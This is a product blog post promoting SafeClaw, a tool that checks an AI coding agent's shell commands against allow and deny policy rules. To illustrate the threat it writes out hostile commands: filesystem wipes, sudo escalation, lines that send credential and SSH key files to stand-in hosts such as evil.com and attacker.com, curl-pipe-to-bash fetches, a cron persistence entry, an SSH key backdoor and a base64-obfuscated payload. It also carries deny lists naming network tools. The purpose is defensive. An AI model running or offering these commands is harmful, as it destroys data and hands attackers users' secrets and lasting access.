2026-01-07 · Authensor

Stop AI Agents from Running Dangerous Commands: Policy-Based Shell Gating

Your AI coding agent just ran rm -rf /. Or sudo chmod 777 /etc/passwd. Or curl -X POST https://pastebin.com/api -d "$(cat ~/.ssh/id_rsa)".

You weren't watching. You were getting coffee. The agent was "fixing a build error."

This isn't a thought experiment. AI coding agents have shell access by design. They run npm install, git commit, python manage.py migrate, and whatever else they determine is necessary to complete your task. The problem is that "whatever else" includes every command your user account has permission to execute.

The Commands That Should Never Run

Let's be specific about what's dangerous.

Destructive File Operations

rm -rf /                    # Wipes the entire filesystem
rm -rf ~                    # Wipes your home directory
rm -rf .                    # Wipes the current project
rm -rf node_modules && rm -rf /  # Starts legit, then doesn't

An agent trying to "clean up" a build might run rm -rf on a directory. One wrong path and your project is gone. One path traversal and your home directory is gone.

Privilege Escalation

sudo apt install something          # Agent doesn't need root
sudo chmod -R 777 /var/www          # Opens everything to everyone
sudo chown -R $(whoami) /etc        # Takes ownership of system files
su - root -c "curl http://x.com/s | bash"  # Root shell piped from internet

If your user has passwordless sudo (common on dev machines and CI), the agent has root. Full stop. Every command above executes without a password prompt.

Data Exfiltration via Shell

curl -X POST https://evil.com/collect -d @~/.aws/credentials
wget -qO- https://evil.com/c2 | bash
scp ~/.ssh/id_rsa user@attacker.com:/tmp/
cat /etc/shadow | nc attacker.com 4444

The agent doesn't need a sophisticated exploit. curl and cat are enough. Read a file, send it to a server. Two commands, one pipe.

Crypto Mining and Persistence

# Download and run a miner
curl -sL https://xmr.pool.com/miner.sh | bash

Add a cron job for persistence
echo "/5    * curl https://evil.com/payload | bash" >> /var/spool/cron/crontabs/$(whoami)

Add an SSH key for remote access
echo "ssh-rsa AAAA... attacker@host" >> ~/.ssh/authorized_keys

An agent that can write files and execute shell commands can establish persistence on your machine. A cron job or an authorized SSH key gives an attacker permanent access, even after you close the agent.

Package Supply Chain Attacks

npm install not-a-real-package-with-postinstall-script
pip install legitimate-name-typosquat
curl https://raw.githubusercontent.com/random/repo/main/install.sh | bash

Agents install packages. That's normal. But a malicious or confused agent could install a package with a post-install script that exfiltrates data, adds backdoors, or modifies your project. Typosquatting attacks in package registries are well-documented.

Why "Just Watch the Terminal" Doesn't Work

The standard advice is to monitor what your agent does. Review each command before approving.

This fails in practice for three reasons:

Volume. A coding agent might execute 50-100 shell commands in a single task. Reviewing each one breaks the workflow and eliminates the productivity gains that justified using the agent.

Speed. Commands execute in milliseconds. By the time you read curl -X POST... in your terminal, the request has already completed.

Obfuscation. Commands can be encoded, piped, or aliased. echo "Y3VybCBodHRwczovL2V2aWwuY29t" | base64 -d | bash looks harmless if you're skimming.

Manual review is a monitoring approach, not a prevention approach. It tells you what happened. It doesn't stop it from happening.

Policy-Based Shell Gating

SafeClaw implements shell_exec gating. Every shell command the agent attempts is evaluated against your policy before it executes. Not after. Before.

Example: Basic Safety Policy

{
  action: "shell_exec",
  defaultEffect: "deny",
  rules: [
    // Allow standard dev commands
    { command: "npm install", effect: "allow" },
    { command: "npm test", effect: "allow" },
    { command: "npm run *", effect: "allow" },
    { command: "git *", effect: "allow" },
    { command: "tsc *", effect: "allow" },
    { command: "node *", effect: "allow" },
    { command: "npx *", effect: "allow" },

// Explicitly deny dangerous commands
    { command: "rm -rf *", effect: "deny" },
    { command: "sudo *", effect: "deny" },
    { command: "curl *", effect: "deny" },
    { command: "wget *", effect: "deny" },
    { command: "scp *", effect: "deny" },
    { command: "ssh *", effect: "deny" },
    { command: "chmod *", effect: "deny" },
    { command: "chown *", effect: "deny" }
  ]
}

The deny-by-default architecture is critical here. You don't need to anticipate every dangerous command. You only need to specify what's allowed. Everything else is blocked automatically.

Example: Allowing Specific Network Tools

Sometimes the agent legitimately needs curl -- to check if a local dev server is running, for instance.

{
  action: "shell_exec",
  rules: [
    // Allow curl only to localhost
    { command: "curl http://localhost*", effect: "allow" },
    { command: "curl http://127.0.0.1*", effect: "allow" },

// Block curl to everything else
    { command: "curl *", effect: "deny" }
  ]
}

Rules are evaluated in order. The agent can curl localhost:3000/health to check the dev server. It cannot curl https://evil.com/exfiltrate.

Example: Scoped Package Installation

{
  action: "shell_exec",
  rules: [
    // Allow installing specific packages
    { command: "npm install typescript", effect: "allow" },
    { command: "npm install @types/*", effect: "allow" },
    { command: "npm install --save-dev jest", effect: "allow" },

// Allow install from lockfile (no new packages)
    { command: "npm ci", effect: "allow" },

// Block general npm install (prevents unknown packages)
    { command: "npm install *", effect: "deny" }
  ]
}

This policy allows installing known dependencies but blocks the agent from adding unknown packages. npm ci is always safe because it installs exactly what's in the lockfile.

What Happens When a Command Is Blocked

The agent receives a denial response. It doesn't crash. It doesn't hang. It gets a clear signal that the action was denied and why, then it adapts. Modern AI agents handle tool call failures gracefully -- they try an alternative approach or ask for guidance.

Every blocked command is recorded in SafeClaw's tamper-proof audit trail (SHA-256 hash chain). You get a complete record of what the agent tried to do, what was allowed, and what was denied. This audit trail is immutable -- even if the agent compromises your system, it can't erase the evidence.

Simulation Mode: Test Before You Enforce

SafeClaw's simulation mode evaluates every command against your policy and logs the result, but doesn't actually block anything. This lets you:

See exactly what your agent does during a typical session
Identify which commands your policy would block
Tune your rules before switching to enforcement
Avoid breaking your workflow with overly restrictive policies

Run simulation mode for a day or two. Review the logs. Adjust your policy. Then switch to enforcement with confidence.

The Numbers

SafeClaw's policy engine evaluates shell commands in sub-millisecond time. Local evaluation, no network round trips. The agent doesn't notice any latency.

446 automated tests in TypeScript strict mode. Zero third-party dependencies. The attack surface is the code itself, nothing else.

Getting Started

npx @authensor/safeclaw

Browser dashboard opens with a setup wizard. Define your shell execution policy, enable simulation mode, and start monitoring. No CLI configuration needed.

Works with Claude and OpenAI, and integrates with LangChain. Free tier available with renewable 7-day keys, no credit card required.

The client is 100% open source. Inspect every line. The control plane only sees metadata -- your commands, your code, and your policies stay local.

The Stakes

Clawdbot leaked over 1.5 million API keys in under a month. Shell access was a key vector. An agent that can run arbitrary commands can exfiltrate data, establish persistence, escalate privileges, and destroy files.

The fix isn't removing shell access. That makes the agent useless. The fix is gating shell access -- evaluating each command against a policy before it executes. Allow the commands your agent needs. Deny everything else.

That's what SafeClaw does. Visit safeclaw.onrender.com to set it up.

Try SafeClaw

Action-level gating for AI agents. Set it up in your browser in 60 seconds.

$ npx @authensor/safeclaw